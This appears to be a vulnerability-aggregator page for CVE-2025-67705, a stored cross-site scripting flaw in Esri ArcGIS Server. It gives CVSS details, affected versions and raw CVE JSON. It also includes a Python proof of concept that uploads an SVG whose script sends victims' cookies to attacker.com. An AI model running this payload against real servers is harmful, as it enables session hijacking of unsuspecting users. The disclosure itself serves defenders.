Security Vulnerability Report
中文
CVE-2025-67705 CVSS 6.1 MEDIUM

CVE-2025-67705

Published: 2025-12-31 23:15:42
Last Modified: 2026-01-06 19:09:09

Description

There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Esri ArcGIS Server 11.4
Esri ArcGIS Server 11.3
Esri ArcGIS Server 11.2
Esri ArcGIS Server 11.1
Esri ArcGIS Server 11.0
Esri ArcGIS Server 10.9及更早版本(Windows和Linux)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-67705 PoC - Stored XSS in Esri ArcGIS Server # Target: Esri ArcGIS Server <= 11.4 TARGET = "https://target-arcgis-server.com" XSS_PAYLOAD = '<script>document.location="https://attacker.com/log?c="+document.cookie</script>' def test_stored_xss(): """ Test for stored XSS vulnerability in ArcGIS Server file upload functionality. This PoC demonstrates how an unauthenticated attacker can store malicious files. """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } # Malicious file content with XSS payload malicious_content = f'''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <script type="text/javascript"> {XSS_PAYLOAD} </script> </svg>''' # Attempt to upload malicious file (unauthenticated) upload_endpoint = f"{TARGET}/arcgis/rest/services/upload" files = {'file': ('malicious.svg', malicious_content, 'image/svg+xml')} try: response = requests.post(upload_endpoint, files=files, headers=headers, timeout=10, verify=False) if response.status_code == 200: result = response.json() print(f"[+] File uploaded successfully: {result}") # Access the uploaded file to trigger XSS if 'itemId' in result: access_url = f"{TARGET}/arcgis/sharing/rest/content/items/{result['itemId']}" print(f"[+] Access uploaded content at: {access_url}") else: print(f"[-] Upload failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") if __name__ == "__main__": test_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67705", "sourceIdentifier": "[email protected]", "published": "2025-12-31T23:15:41.540", "lastModified": "2026-01-06T19:09:08.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser."}, {"lang": "es", "value": "Hay un problema de scripting entre sitios almacenado en Esri ArcGIS Server 11.4 y versiones anteriores en Windows y Linux que en algunas configuraciones permite a un atacante remoto no autenticado almacenar archivos que contienen código malicioso que puede ejecutarse en el contexto del navegador de una víctima."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.5", "matchCriteriaId": "EC44DA7C-0CB3-4D79-B502-2B26954DB4DC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}